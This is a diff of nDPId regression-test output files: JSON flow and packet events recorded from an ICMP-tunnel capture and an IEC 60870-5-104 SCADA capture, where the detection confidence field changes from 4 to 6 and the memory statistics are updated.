-00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":247,"flow_first_seen":1360227866459,"flow_last_seen":1360228422618,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":40240,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1360228422618,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00785{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":160,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":147,"flow_first_seen":1360227866459,"flow_last_seen":1360228057029,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":17193,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1360228057029,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":214,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":187,"flow_first_seen":1360227866459,"flow_last_seen":1360228178094,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":30249,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1360228178094,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":257,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":220,"flow_first_seen":1360227866459,"flow_last_seen":1360228298215,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":37116,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1360228298215,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":247,"flow_first_seen":1360227866459,"flow_last_seen":1360228422618,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":40240,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1360228422618,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":298,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":251,"total-skipped-flows":0,"total-l4-payload-len":40400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":4,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1360228467662} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1360227866459,"flow_last_seen":1360228543914,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":59886,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1360228543914,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed 
Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":525,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":460,"flow_first_seen":1360227866459,"flow_last_seen":1360228682488,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":67252,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1360228682488,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":569,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":1360227866459,"flow_last_seen":1360228816210,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":70088,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1360228816210,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":801,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":708,"flow_first_seen":1360227866459,"flow_last_seen":1360228942891,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":98648,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1360228942891,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00785{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":863,"flow_first_seen":1360227866459,"flow_last_seen":1360228988973,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":161468,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1360228988973,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1360227866459,"flow_last_seen":1360228543914,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":59886,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1360228543914,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":525,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":460,"flow_first_seen":1360227866459,"flow_last_seen":1360228682488,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":67252,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1360228682488,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":569,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":1360227866459,"flow_last_seen":1360228816210,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":70088,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1360228816210,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":801,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":708,"flow_first_seen":1360227866459,"flow_last_seen":1360228942891,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":98648,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1360228942891,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00785{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":863,"flow_first_seen":1360227866459,"flow_last_seen":1360228988973,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":161468,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1360228988973,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":961,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":961,"packets-processed":863,"total-skipped-flows":0,"total-l4-payload-len":161468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":8,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1360228988973} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 961/863 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894470 bytes -~~ total memory freed........: 5894470 bytes -~~ total allocations/frees...: 118977/118977 +~~ total memory allocated....: 6028104 bytes +~~ total memory freed........: 6028104 bytes +~~ total allocations/frees...: 121739/121739 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 791 chars 
diff --git a/test/results/iec60780-5-104.pcap.out b/test/results/iec60780-5-104.pcap.out index e8c4a5875..0140bea13 100644 --- a/test/results/iec60780-5-104.pcap.out +++ b/test/results/iec60780-5-104.pcap.out 
@@ -4,39 +4,39 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 